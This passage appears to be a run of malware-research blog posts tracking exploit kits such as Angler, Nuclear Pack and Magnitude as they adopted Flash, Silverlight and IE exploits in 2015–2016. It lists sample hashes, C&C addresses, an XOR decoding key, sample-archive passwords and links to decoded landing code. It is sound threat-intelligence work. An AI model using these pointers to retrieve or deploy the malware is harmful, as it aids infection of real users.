Vawtrak. I have been told (Thanks ! ) it's US focused. Got geo Glitched. Maybe more about that a day or the other.- Refine the check conditions for Researcher. IP  85.25.41.95 and sid=1901...otherwise...ok :)[/Edits]Acknowledgements :Thanks Will Metcalf and Malc0de for the discussions and help on this topic--I'm sorry, but I must do it...Greetings to Angler and Bedep guys. 😉 You are keeping us busy...and awake !Reading :Video Malvertising Bringing New Risks to High-Profile Sites - 2016-03-18 - ProofpointBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - ArborSertAngler EK : now capable of "fileless" infection (memory malware) - 2014-08-30Modifying VirtualBox settings for malware analysis - 2012-08-23  - Mikael Keri

Spotted in a "degraded" version on the 2016-04-02 in Magnitude, live also since 2016-03-31 in Nuclear Pack, Adobe was really fast at fixing  this vulnerability with the patch released on the 2016-04-07 bringing Flash Player to version 21.0.0.213It's not the first time a "0day" exploit is being used in a "degraded" state.This happened before with Angler and CVE-2015-0310 and CVE-2014-8439You'll find more details about the finding on that Proofpoint blog here :"Killing a zero-day in the egg: Adobe CVE-2016-1019"and on that FireEye blog here:CVE-2016-1019: A new flash exploit included in Magnitude Exploit KitNote : we worked with Eset, Kaspersky and Microsoft as well on this case.Nuclear Pack :2016-03-31 "Degraded"Identification by  Eset, Kaspersky and FireEye (Thanks)Exploit sent to Flash Player 20.0.0.306 by Nuclear Pack on the 2016-03-31CVE-2016-1019 insideSample in that pass:  301f163644a525155d5e8fe643b07dceac19014620a362d6db4dded65d9cad90Out of topic example of payload dropped that day by that instance of Nuclear : 42904b23cff35cc3b87045f21f82ba8b (locky)Note the string "CVE-2016-1001" in the Nuclear Pack, explaining why maybe this exploit is being used in a degraded state.CVE-2016-1001 string spotted by Denis O'Brien (Malwageddon), the 2016-04-05 in Nuclear Pack exploitMagnitude :2016-04-02 "Degraded" to 20.0.0.306Identified as is by FireEye[2016-04-07: TrendMicro told me they found some hits for this exploit in Magnitude back from 2016-03-31 as well]Magnitude exploiting Flash 20.0.0.306 with CVE-2016-1019 the 2016-04-02 in the morning.Payload is Cerber.Side note : the check on the redirector in front of Magnitude ( http://pastebin.com/raw/gfEz25fa ) which might have been fixed with the CVE-2015-2413 was in Magnitude landing itself from September to end of November 2015.res:// onload check features unobfuscated at that time in Magnitude Landing 2015-09-29Sample in that pass: 0a664526d00493d711ee93662a693eb724ffece3cd68c85df75e1b6757febde5Out of topic payload: 9d92fb315830ba69162bb7c39c45b219cb8399dd4e2ca00a1e21a5457f92fb3c Cerber RansomwareNote: I got successful pass with Windows 8.1 and Flash 20.0.0.272 as well and Windows 10 build 1511 (feb 2016) via Flash 20.0.0.306 on Internet Explorer 11. Edge seems not being served a landing.Neutrino:2016-04-11 - "degraded" as well it seems. (at least didn't got it to work on Flash 21.x)CVE id by @binjo and Anton Ivanov (Kaspersky)Neutrino successfully exploit Flash 20.0.0.306 with CVE-2016-10192016-04-11Fiddler : Sent to vtOut of topic payload: 83de3f72cc44215539a23d1408c140ae325b05f77f2528dbad375e975c18b82e Reading :Killing a zero day in the egg : CVE-2016-1019 - 2016-04-07 - ProofpointCVE-2016-1019: A new flash exploit included in Magnitude Exploit Kit - 2016-04-07 -  Genwei Jiang - FireEyeZero-Day Attack Discovered in Magnitude Exploit Kit Targeting CVE-2016-1019 in Older Versions of Adobe Flash Player - 2016-04-07 - Peter Pi, Brooks Li and Joseph C. Chen - TrendMicro

Two weeks after Flash patch,  two months after last Flash exploit integration in Angler, on the 2016-03-25 Angler EK, in some threads, is starting to send an exploit to Flash Player 20.0.0.270 and 20.0.0.306I tried multiple configuration but I was not able to get exploited. The following day I got successful infections with Flash 20.0.0.270 and 20.0.0.306.Angler EK :2016-03-25The CVE here has been identificated as CVE-2016-1001 by Eset and Kaspersky (Thanks)2016-03-26 - Angler EK successfully exploiting Flash 20.0.0.306 in Internet Explorer 11 on Windows 7Fiddler sent to VT here.Hash of the associated SWF fwiw : b609ece7b9f4977bed792421b33b15daObserved as well : ab24d05f731caa4c87055af050f26917 - c4c59f454e53f1e45858e95e25f64d07NB : this is just "one" pass.  Angler EK can be used to spread whatever its customers want to spread .Selected examples I saw in the last 4 days : Teslacrypt (ID 20, 40,52, 74 ,47) , Locky (affid 14 - 7f2b678398a93cac285312354ce7d2b7  and affid 11 - f417b107339b79a49e4e63e116e84a32), GootKit b9bec4a5811c6aff6001efa357f1f99c, Vawtrak  0dc4d5370bc4b0c8333b9512d686946cRamnit 99f21ba5b02b3085c683ea831d79dc79Gozi ISFB (DGA nasa) 11d515c2a2135ca00398b88eebbf9299BandarChor, (several instances, ex f97395004053aa28cadc6d4dc7fc0464 - 3c9b5868b4121a2d48b980a81dda8569 )Graybird/LatentBot f985b38f5e8bd1dfb3767cfea89ca776Dridex - b0f34f62f49b9c40e2558c1fa17523b5 (this one was 10 days ago..but worth a mention)Andromeda (several instances)and obviously many Bedep threads and their stream of PE (evotob, reactorbot (several instances), Tofsee, Teslacrypt,Kovter, Miuref)Edit 1: 2016-03-29 -  I was mentioning 2016-1010 as a candidate but it's not. Modified with the correct CVE ID provided by Eset and Kaspersky..

Fixed with the January 2016 Microsoft patches, CVE-2016-0034  ( MS16-006 ) is a Silverlight Memory Corruption vulnerability and it has been spotted by Kaspersky with rules to hunt Vitaliy Toropov’s unknown Silverlight exploit mentioned in HackingTeam leak.Angler EK :On the 2016-02-18 the landing of Angler changed slightly to integrate this piece of code :Silverlight integration Snipet from Angler Landing after decoding2016-02-18resulting in a new call if silverlight is installed on the computer:Angler EK replying without body to silverlight callHere a Pass in great britain dropping Vawtrak via Bedep buildid 77862016-02-18I tried all instances i could find and the same behavior occured on all.2016-02-22 Here we go : call are not empty anymore.Angler EK dropping  Teslacrypt via silverlight  5.1.41105.0 after the "EITest" redirect 2016-02-22I made a pass with Silverlight : 5.1.41212.0 : safe.Edit1 : I received confirmation that it's indeed CVE-2016-0034 from multiple analyst including Anton Ivanov (Kaspersky). Thanks !Xap file : 01ce22f87227f869b7978dc5fe625e16Dll : 22a9f342eb367ea9b00508adb738d858Out of topic payload : 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)Fiddler sent hereRIG : 2016-03-29Malc0de spotted modification in the Rig landing indicating integration of Silverlight Exploit.Here is a pass where the Silverlight is being fired and successfully exploited. CVE identification by : Anton Ivanov (Kaspersky)RIG - CVE-2016-0034 - 2016-03-29Xap file in that pass :  acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6bcontaining this dll : e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415( Out of topic payload : Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80 )Files : Fiddler and sample (password is malware)Reading :The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - KasperskyPost Publication Reading:(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

Lately I received multiple questions about connection between Reveton and Cryptowall.I decided to have a look.A search in ET Intelligence portal at domains from Yonathan's Cryptowall TrackerET Intelligence search on Specspa .comshow that the first sample ET has talking with it is :e2f4bb542ea47e8928be877bb442df1b  2013-10-20A look at the http connexion shows the "us.bin" call mentioned by Yonathan (btw the us.bin item is still live there)ET Intelligence  : e2f4bb542ea47e8928be877bb442df1b http connexionsET Intelligence : Associated alert pointing at Cryptowall.A look into VirusTotal Intelligence shows that this sample is available in a Pcap captured and shared by ThreatGlass :NSFW://www.threatglass .com/malicious_urls/sunporno-comHiman EK dropping Cryptowall 2013-10-20captured by ThreatGlassWith the same referer and in the same Exploit Kit i got dropped 20 days earlier Flimrans :(See : http://malware.dontneedcoffee.com/2013/10/HiMan.html )Flimrans disappeared soon after this post from 2013-10-08 about the affiliate :http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.htmlInterestingly Flimrans is showing in US the same Design from Reveton pointed by Yonathan :Flimrans US 2013-10-03What is worth mentioning is that Flimrans was the only ransomware (i am aware of) to show a Spanish version of this same design :Flimrans ES 2013-10-03The timeline is also inline with a link between those two Ransomware (whereas Reveton was still being distributed months after these events).Digging into my notes/fiddlers i even found that this bworldonline .com which is still hosting the us.bin was in fact also the redirector to HiMan dropping Flimrans 20 days earlier from same sunporno upper.[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]The compromised server storing the first design Blob used by cryptowallused to redirect 20 days earlier to Himan dropping Flimrans (which is using that same design).So...Cryptowall son of Borracho? I don't know for sure...but that could to be a possibility.Files : Items mentionned here. (password is malware)Read More:HiMan Exploit Kit. Say Hi to one more - 2013-10-02Flimrans Affiliate : Borracho - 2013-10-08

While other exploit kit are struggling to keep up with Angler (none is firing CVE-2015-8446 , maybe because of the Diffie-Hellman protection on Angler's exploits ),- Nuclear / Magnitude and Neutrino last exploits are from October (CVE-2015-7645)- RIG and Sundown are relying on July exploits (Hacking Team's one - CVE-2015-5122)( all have the IE CVE-2015-2419 from august)Angler has just integrated CVE-2015-8651 patched with Flash 20.0.0.270 on 2015-12-28Angler EK : 2016-01-25The exploit might be here since the 22 based on some headers modification which appeared that day.It's not yet pushed in all Angler EK threads but widely spread.Thanks Anton Ivanov (Kaspersky) for CVE Identification !CVE-2015-8651 (and CVE-2015-2419) being successfully exploited by Angler EK to load bedep in memory2016-01-25Fiddler sent to VT.---Another pass via the "noisy" Cryptowall "crypt13x" actor which threads also has it :CVE-2015-8651 being successfully exploited by Angler EK to load Cryptowall  (crypt13001)from the widely spread and covered "crypt13x" actor thread - 2016-01-25(Out of Topic payload : 5866906a303b387b9918a8d7f8b08a51 Cryptowall crypt13001 )I have been told by Eset that the exploit is successful on Flash 20.0.0.235 and Firefox.---I spotted a thread serving a landing and an exploit to Firefox.2016-03-23 Firefox pass with Sandbox escape :Angler EK exploiting CVE-2015-8651 on Firefox 33.1.1 and Flash 20.0.0.305Bedep successfully wrote its payload on the drive.2016-03-23Files : Fiddler in a zip (password malware)Neutrino :Thanks Eset for identifying the added CVE here.Neutrino Exploiting CVE-2015-8651 on 2016-02-09Here Bunitu droppedNote: For some reason couldn't have it working with Flash 20.0.0.228.Files : Fiddler here (password is malware)Nuclear Pack:Thanks again Eset for CVE identification here.Nuclear Pack exploit CVE-2015-8651 on 2016-02-10Out of topic payload: cdb0447019fecad3a949dd248d7ae30f which is a loader for CloudScout (topflix .info - which we can find in RIG as well those days)It seems Chrome won't save you if you do let it update.2016-02-17 on DE/US/FR trafficThis is not something i can reproduce.Is what i get with Chrome 46.0.2490.71 and its builtin 19.0.0.207 (which should fast update itself to last version)Files : Fiddler here (password: malware)Magnitude:2016-02-18CVE ID confirmed by Anton Ivanov (Kaspersky)Magnitude dropping Cryptowall via CVE-2015-86512016-02-18Files : Fiddler here (Password is malware)RIG :Some days before 2016-04-06Thanks FireEye for CVE identification.CVE-2015-8651 successfuly exploited by RIG on 2016-04-07Sample in that pass: 4888cc96a390e2970015c9c1d0206011a6fd8e452063863e5e054b3776deae02( Out of topic payload: 30cb7ed7a67eb08fa2845990b7270d64d51e769d6e0dad4f9c2b8e7551bced0a Probably Godzilla downloader)Files : RIG_2016-04-07 (swf, payload and Fiddler - password is malware)Read More:(GoogleTranslate - via @eromang ) Offshore "Dark Hotel" organization of domestic business executives launched APT attacks - 2015-12-31 - ThreatBookPost publication reading :An Analysis on the Principle of CVE-2015-8651 - Antiy Labs - 2016-01-26

Snipshot of MonterAV AffiliateAs I got many questions about an EK named XXX (that is said to be better than Angler 😉 ) I decided to share some data here.XXX Control Panel Login Page.XXX is Angler EK ( it's the real name of its most documented instance at least)Angler EK / XXX  IE sploit only Stats on 2015-07-25(for some reason Flash Exploits were not activated on that thread)Note the Chase Logo >> JPMorgan  >>  Cool EK's Exploit Buyer ;)You might want to read "The Transition - "Reveton Team" or "Mr.J/Monster AV" from :Paunch's arrest...The end of an Era ! (2013-10-11) . This is where I first wrote the defense chosen name for this Exploit Kit. The name is chosen after a logo from the Reveton Affiliate.Snipshot of "The Transition" after Paunch's ArrestBut Angler was around before the Reveton team started to use it.Here is one used against Ukrainian that i captured  in August 20132013-08-27 - Exploit Kit unknown to me at that timeAncestor of Angler EK as we know it[Payload here is most probably Lurk]when Reveton Team was still on Cool EK. It appears that instance had already Fileless capabilities.A Russian researcher friend connect that instance back to this Securelist post from 2012-03-16 : A unique ‘bodiless’ bot attacks news site visitorsSo the (c) 2010 at the bottom of the control panel is probably...the real birth year of Angler.This indexm.html variant of Angler EK is most probably still being used in RU/UA and was one of the early adopter of CVE-2015-0311 (a flash 0day from January) before many "standard" instances of Angler. There was still java exploit inside in march2015-01-27 - Angler EK "indexm" exploiting CVE-2015-2551 and firing Java exploits[Payload here is most probably Lurk]Angler EK has been briefly mentioned (translation here ) as part of a "partnerka" by a user using Menatep as Nickname in February 2014Conclusion : xxx is what we call Angler EK and Angler EK (indexm instance) is not that young!Files : 2 Fiddler pass of Angler EK "indexm" from 2013 and 2015 (Password : malware)Read More :Police Locker land on Android Devices - 2014-05-04Paunch's arrest...The end of an Era ! - 2013-10-11Crimeware Author Funds Exploit Buying Spree - 2013-01-07 - KrebsOnSecurityCool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop - 2012-10-09A unique ‘bodiless’ bot attacks news site visitors - 2012-03-16 - Sergey Golovanov - SecurelistPost publication Reading :Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC News [Cf Lurk]Is it the End of Angler ? - 2016-06-11How we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

One week after patch Flash 19.0.0.245 is being exploited by Angler EK via CVE-2015-8446Angler EK :2015-12-14CVE identification by Anton Ivanov ( Kaspersky ) and FireEye  (Thanks !)Angler EK exploiting Flash 19.0.0.245 via CVE-2015-84462015-12-14Sample in that pass : b5920eef8a3e193e0fc492c603a30aafSample from other Angler EK instance : 0615fb9e037b7bf717cc9b04708e51da 720089b93a0f2bb2a72f1166430de522Fiddler sent to VT.(Not replayable. You know how to contact me to land on live instances. I might not reply to mail coming from gmail,live,yahoo etc...  mailboxes)Out of topic : in that pass Bedep BuildID 5004 is loaded in Memory and is then grabbing those 2 dll in a streamf5c1a676166fe3472e6c993faee42b34d65f155381d26f8ddfa304c83b1ad95a (Credential Stealer)and after that performing AdfraudCVE-2015-8446 in Angler EK - malicious mp3 is stored in encrypted JSON (same schema as in CVE-2015-5560). pic.twitter.com/FCyvP43Q0X— Anton Ivanov (@antonivanovm) December 17, 2015 Last safe version of Flash against commercial exploit kit  was 19.0.0.226 fixing CVE-2015-7645Post publication readings :(Google Translate) Angler EK latest CVE-2015-8446 Flash Exploit analysis - 2015-12-19 - Qihoo360

Yesterday's Nymaim spam campaign was also redirecting to Nuclear Pack.Without big surprise the sample ( 592899e0eb3c06fb9fda59d03e4b5b53 ) dropped by Nuclear is the same as the fake update proposed.But there was an additionnal 11kb payload call for which i could not find sample on driveNuclear Pack dropping Nymaim in the 2015-11-30 Spam CampaignIt was also unusually encoded with two XOR pass and first part of the decoded stream is a Shellcode.Friends (who don't want to be mentioned) figured a privilege escalation was in use there :According to Kaspersky and Timo Hirvonen (F-Secure) it's CVE-2014-4113 ( Win32k.sys Elevation of Privilege Vulnerability )I did not got to see the privilege escalation in live condition.Note: it's not the first time a public Exploit Kit is integrating an exploit to escalates right on dropped payload (Cf CVE-2015-2426 in Magnitude )Files : Fiddler and Dll here (password is malware - XOR key : 56774347426F664767  then  213404052d09212031)Thanks : Kaspersky,  Timo Hirvonen , Malc0de and 2 other friends for taking some time and use their wizardness  on this.Read More :An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) - 2014-10-29 - TrendMicro

Trash and Mailbox by Bethesda SoftworksOtlard.A (or let's say at least the malware triggering 2806902 || ETPRO TROJAN Win32.Otlard.A C&C Checkin response )  is a Spam BotnetI saw it loaded as a plugin in an instance of AndromedaThat Andromeda is being spread via :Bedep build id 6005 and here 6007 from an Angler EK fed by Malvertising :VirtualDonna group redirecting traffic to an Angler instance loading Bedep buildid 6007 in memoryBedep 6007 loading Andromeda 55ead0e4010c7c1a601511286f879e33 before update task.2015-09-28Note : Bedep 6007 was sometimes loading it with other payload-2015-09-16 for : ec5d314fc392765d065ff16f21722008 with Trapwot (FakeAV) e600985d6797dec2f7388e86ae3e82ba and Pony a4f08c845cc8e2beae0d157a3624b686-2015-09-29 for : 37898c10a350651add962831daa4fffa with Kovter ( 24143f110e7492c3d040b2ec0cdfa3d0 )That Andromeda beaconing to dnswow .com enslaved >10k bots in a week :Andromeda dnswow 2015-11-22Andromeda dnswow 2015-11-27Here the Otlard.A task in that Andromeda instance :Task installing Otlard.A as a plugin to Andromedaa Task in a Smokebot dropped by Nuclear Pack fed by Malvertising :Malvertising > Nuclear Pack > Smokebot > Stealer, Ramnit, Htbot and Andromeda > Otlard.A2015-11-28Smokebot : cde587187622d5f23e50b1f5b6c86969Andromeda : b75f4834770fe64da63e42b8c90c6fcd(out of topic Ramnit : 28ceafaef592986e4914bfa3f4c7f5c0 - It's being massively spread those days in many infection path. (Edit 2015-12-29 :  Htbot.B :  d0a14abe51a61c727420765f72de843a named ProxyBack by PaloAlto)Now here is what the control panel of that plugin looks like :Otlard.A panel :Otlard.A - JahooManager - Main - 2015-09-27Otlard.A - JahooManager - Servers - 2015-09-27Otlard.A - JahooManager - Settings - 2015-09-27Otlard.A - JahooManager - Campaigns - 2015-09-27Otlard.A - JahooManager - Bot - 2015-09-27that exe is : 2387fb927e6d9d6c027b4ba23d8c3073 and appears to be AndromedaOtlard.A - JahooSender - Tasks - 2015-09-27Otlard.A - JahooSender - Tasks - 2015-11-28Otlard.A - JahooSender - Tasks - Done Task - 2015-09-27Otlard.A - JahooSender - Domains - 2015-09-27Otlard.A - JahooSender - Domains - 2015-11-28Otlard.A - JahooSender - Messages - 2015-09-27Otlard.A - JahooSender - Messages - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Headers - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender  - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Attach - 2015-11-28Otlard.A - JahooSender - Attach - Attached image - 2015-11-28Otlard.A - JahooSender - Rules - 2015-11-28Otlard.A - JahooSender - Rules > Spam - 2015-11-28Olard.A - JahooSender - Rules > User - 2015-11-28Olard.A - Bases - Emails - 2015-11-28Olard.A - Bases - Blacklist - 2015-11-28Olard.A - Bases - Blacklist - Edit - 2015-11-28Olard.A - Botnet - Main - 2015-09-27Olard.A - Botnet - Main - 2015-11-28Otlard.A - Botnet - Modules - 2015-11-28Otlard.A - Botnet - Modules - Edit - 2015-11-28Otlard.A - Incubator - Accounts - 2015-11-28Otlard.A - Incubator - Settings - 2015-11-28Note : registrator menu has disappeared in last version. --Andromeda C&C 2015-11-28 :5.8.35.241202023 | 5.8.35.0/24 | LLHOST | EU | llhost-inc.com | LLHost IncSpam Module C&C 2015-11-28 :5.8.32.10 5.8.32.85.8.32.525.8.34.205.8.32.535.8.32.56202023 | 5.8.32.0/24 | LLHOST | EU | zanufact.com | LLHost IncThanks : Brett StoneGross for helping me with decoding/understanding the network communicationsFiles :All samples which hashes have been discussed here are in that zip.Jahoo - socker.dll : 7d14c9edfd71d2b76dd18e3681fec798( If you want to look into this, i can provide associated network traffic)Read More :Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02Inside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Inside Smoke Bot - Botnet Control Panel - 2012-04-28Post publication Reading :ProxyBack Malware Turns User Systems Into Proxies Without Consent - 2015-12-23 - JeffWhite - PaloAlto

The CVE-2015-7645 has been fixed with Adobe Flash Player 19.0.0.226. Spotted in the wild (2015-10-13) in APT28's exploit kit by TrendMicro, this exploit was already reported 2 weeks before (2015-09-29) to Adobe by Natalie Silvanovich.I reported the Flash 0-day (CVE-2015-7645) two weeks before it was found in the wild https://t.co/nYeAWRG5jO— Natalie Silvanovich (@natashenka) 16 Octobre 2015 It has now made its way to Exploit KitAngler EK :2015-10-29CVE id confirmed by by Anton Ivanov ( Kaspersky )Angler EK successfully exploiting Flash 19.0.0.2072015-10-29Flash sample in that pass : 4af57fb1c71bb9c1599371d48240ff36Another sample : bea824974f958ac4efc58484a88a9c18One more from the Poweliks instance : 0d72221d41eff55dcfd0da50cd1c545eNot replayable fiddler sent to VTOut of topic sample loaded by bedep :5a60925ea3cc52c264b837e6f2ee915e Necursa9d5a9a997954f5421c94ac89d2656cd Vawtrak ( < that one was not expected in that infection path)2016-03-12Edge is now being served a landing and the flash being sent is targeting this CVE according to Kaspersky and EsetAngler EK exploiting Flash 18.0.0.209 on Windows 10 (build 10240) through EdgeFiddler : AnglerEK_Edge_18.0.0.209_2016-03-11.zipNuclear Pack:2015-10-30Nuclear Pack which has been playing with landing URI pattern lately has integrated itCVE-2015-7645 in Nuclear Pack on 2015-10-30Sample in that pass : f5dd2623ae871d58483bf14ec5d635e4Out of topic payload : 0b3de2a8d838883e10a1d824d20fe95c Kelihos Loader (harsh02)Fiddler sent to VTMagnitude:2015-11-10Magnitude trying to exploit CVE-2015-76452015-11-10Spotted sample : 21993dd3b943d935a9296aeff831cbb9 CVE id confirmed by Timo HirvonenNo payload but the actor behind that thread would like to see you Cryptowalled. Update might come.Spartan :2015-11-12Without surprise as Spartan is the work of the coder of Nuclear Pack.Note : old version of Chrome <= 43.0.257 and Firefox < 38 seems to be falling as wellSpartan pushing Pony and Alphacrypt via CVE-2015-76452015-11-12Sample in that pass : 1c074c862d3e25ec9674e6bd62965ad8  (another one: 66f34cd7ef06a78df552d18c729ae53c )(out of topic payload : Pony: 29c940f9d0805771e9c7ec8a5939fa25 (45.63.71.12 /myadvert/autoget.php) and Cryptowall 74ebff4acc4ad9c2a2e665ff293c02e6  NB earlier today drops were Pony and Alphacrypt ) Fiddler sent to VTNeutrino:Most probably appeared 2015-10-16Necurs being dropped by Neutrino via CVE-2015-76452015-11-17Sample in that pass: 7dd9813ef635e98dd9585deaefecfcff(Out of topic payload : Necurs a83a96e87e80adef1e4598a645f2918c )Fiddler sent to VT  (You might want to read the detailed analysis by Trustave)Read More :Adobe Flash: Type Confusion in IExternalizable.writeExternal When Performing Local Serialization - 2015-09-29 - Natalie SilvanovichNew Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries - 2015-10-13 - Feike Hacquebord - Brooks Li - Peter Pi - TrendMicroLatest Flash Exploit Used in Pawn Storm Circumvents Mitigation Techniques - 2015-10-16 - Peter Pi - TrendMicroPost Publication Reading :Neutrino Exploit Kit – One Flash File to Rule Them All - 2015-12-28 - Daniel Chechik and Anat Davidi - Spiderlabs/Trustwave

In the post on the UK focused Shifu I illustrated malvertising traffic to Angler.The traffer group behind this activity is the same exposed by BelchSpeak from Invincea in many tweets (explaining the addition of code to spot Invincea Sandbox)  FoxIT in june,  Malwarebytes in September,  or Trendmicro 2 weeks ago.As it's easier to have a name to share/talk  about stuff i'll use "VirtualDonna Traffers" to refer to them (virtualdonna .com is one of the domains they used that got some attention)Earlier this year they were using https bit.ly,2015-07-11 - bit.ly as https url shortenertiny url2015-07-11 - tiny url as https url shorteneror goo.gl url shortener2015-06-12 - goo.gl as https url shorterner and switched to their own https redirector behind cloudflare around the middle of September ( naotsandhap.euTwo pass here : same source (Dailymotion), same country (Australia), same Traffer for same customer (how/why? same payload : Reactorbot  srvdexpress3 .com)Different Legit part of the chain2015-09-29then 2 weeks ago mediacpm.com and wrontoldretter.eu )https gives the traffer the ability to kill the referer chain (making it more difficult to figure out where the Exploit Kit landing spotted in the traffic is coming from).Once discovered a way to Sig this is to flag the ssl certificate being used.Those days they are using a DoubleClick https open redirect.VirtualDonna Traffers exploiting an https open redirect by Doubleclick in its chain to Angler EKGB - 2015-10-15Out of topic Payload in that pass : Shifu - 695d6fbd8ab789979a97fb886101c576 beaconing to nyctradersacademy .comDoubleclick has been informed about the issue.Post Publication Readings :The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK - 2015-12-15 - ProofpointLet’s Encrypt Now Being Abused By Malvertisers - 2016-01-06 - TrendMicro

I noticed since several days a shift in malware distribution in the UK.Many infection path that I follow are now dropping a banker that i already saw many times, especially at the end of 2014 and mostly in Italy.First time I encountered that threat : 2014-10-08Angler EK dropping 165146e43ccee9c29b62693caf290df7 in an IT focused infection path2014-10-08At that time I learnt from Frank Ruiz ( FoxIT ) that he spotted it 1 month earlier (2014-09-03 exactly). We were using a "non public" name to talk about it.So two days ago in UK traffic :2015-09-22 - An Angler EK dropping  0598ee3e06c681d7f9e05d83bb7ea422 via malvertising on GBR trafficI saw that banking trojan again. (note : contacted,  Frank Ruiz told me that this banker activity never really stopped). What was new to me is that it was installing Apache,Apache folder installed by 0598ee3e06c681d7f9e05d83bb7ea422 2015-09-22Apache ConfigData folder of the Apache installationCustomers of 4 financial institutions are targeted by the injects stored in the config.xmlconfig.xmlThe same day i saw it again, other malvertising campaign (read: other actor bringing the traffic) and not dropped directly but as a 2nd Stage in a bedep thread which was not grabbing an adfraud module:Angler EK pushing bedep grabbing 791491ba9f0a7670659f45f1e5421c83 2015-09-22Seeing it again today in malvertising campaign focused on UK, I decided to write about that and contacted Brett StoneGross (Dell SecureWorks) to try and get the 'defense name' for this. He told me that what I was describing was probably Shifu ..and fast confirmed it looking at the sample. (Edit reaction to twitter : He also told me that Shifu is based on Shiz)So here we are: Shifu <3 GBRShifu <3 GBR2015-09-24Side note : Here are some of the DGA in case main domain stop working.Files : ShifuPackage_2015-09-24.zip Password : malwareContains : 4 fiddler, 1 pcap, 6 samples and 2 apache config folder (with injects).Thanks: Frank Ruiz (Foxit) and Brett StoneGross (Dell SecureWorks) for their inputs/insight/awesomeness.Read More:Shifu: ‘Masterful’ New Banking Trojan Is Attacking 14 Japanese Banks - 2015-08-31 - Limor Kessem - IBM X-ForceJapanese Banking Trojan Shifu Combines Malware Tools - 2015-09-24 - Diwakar Dinkar - McAfeePost publication Reading:3,000 High-Profile Japanese Sites Hit By Massive Malvertising Campaign  2015-09-30 - Trenmicro

Patched with flash version 18.0.0.232, CVE-2015-5560 is now being exploited by Angler EK.Angler EK :2015-08-29[Edit : 2015-09-01] Exploit candidated by by Anton Ivanov ( Kaspersky ) as CVE-2015-5560 [/edit]The exploit has been added the 28th. It's not being sent to Flash 18.0.0.232..It uses the same Diffie-Hellman Key Exchange technique described by FireEye as in their CVE-2015-2419 implementation making a default fiddler unreplayable.Angler EK pushing Bedep to Win7 IE11 Flash 18.0.0.209 - CVE-2015-55602015-08-29Sample in that pass : 9fbb043f63bb965a48582aa522cb1fd0Fiddler sent to VT (password is malware)Note: with help from G Data, a replayable fiddler is available. No public share (you know how to get it).Nuclear Pack :2015-09-10Additional post spotted on the 2015-09-10Nuclear Pack additionnal post on 2015-09-10 showing integration of CVE-2015-5560 was on the roadand got a first payload  the day after :Nuclear Pack successfully exploiting Flash 18.0.0.209 with CVE-2015-5560 (rip from Angler)2015-09-11( Out of topic payload : 91b76aaf6f7b93c667f685a86a7d68de  Smokebot C&C  hostnamessimply1.effers .com: )Files : Fiddler here (Password is malware)Read More :Adobe Flash: Overflow in ID3 Tag Parsing - 2015-06-12 Google Security ResearchThree bypasses and a fix for one of Flash's Vector.<*> mitigations - 2015-08-19 - Chris Evans - Google Project ZeroCVE-2015-2419 – Internet Explorer Double-Free in Angler EK  - 2015-08-10 - FireEyeBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schartz - Arbor SertPost publication reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 KasperskyAnalysis of Adobe Flash Player ID3 Tag Parsing Integer Overflow Vulnerability (CVE-2015-5560) - 2016-01-12 - Nahuel Riva - CoreSecurity

As published by FireEye Angler EK is now exploiting CVE-2015-2419 fixed with MS15-065Angler EK :2015-08-10It seems they might have started to work on that exploit as early as 2015-07-24 where some instances briefly used code to gather ScriptEngineVersion from redirected visitors :Angler EK gathering ScriptEngineVersion data the fast way.2015-07-24Today first pass i made was showing a new POST call and was successfully exploiting a VM that used to be safe to Angler.CVE-2015-2419 successfully exploiting IE11 in windows 72015-08-10(Here bedep grabbing Pony and TeslaCrypt then doing some AdFraud)I spent (too much 😉 ) time trying to decode that b value in the POST reply.Here are some materials :- The landing after first pass of decoding and with some comments : http://pastebin.com/JQuyAXarThe post call is handled by String['prototype']['jjd'] , ggg is sent to Post data as well as the ScriptEngineVersion (in the shared pass : 17728 )- The l() function handling the post : http://pastebin.com/hxZJwbaY- The post data and reply after first pass of decoding : http://pastebin.com/raw.php?i=NWkU7CXrFiles : 2 Fiddlers (ScriptEngineVersion Gathering and successfull pass - use malware as password)Thanks :Horgh_RCE for his helpMagnitude :2015-08-22( I am waiting for some strong confirmation on CVE-2015-2426 used as PrivEsc only here )Magnitude successfully exploiting CVE-2015-2419 to push an elevated (CVE-2015-2426) Cryptowall on IE11 in Win72015-08-22As you can see the CVE-2015-2419 is a RIP of Angler EK's implementation (even containing their XTea key, despite payload is in clear)Note : The CVE-2015-2426 seems to be used for privilege escalation onlyCryptowall dropped by Magnitude executed as NT Authority\system after CVE-2015-24262015-08-23and has been associated to flash Exploit as well.Pass showing the privilege 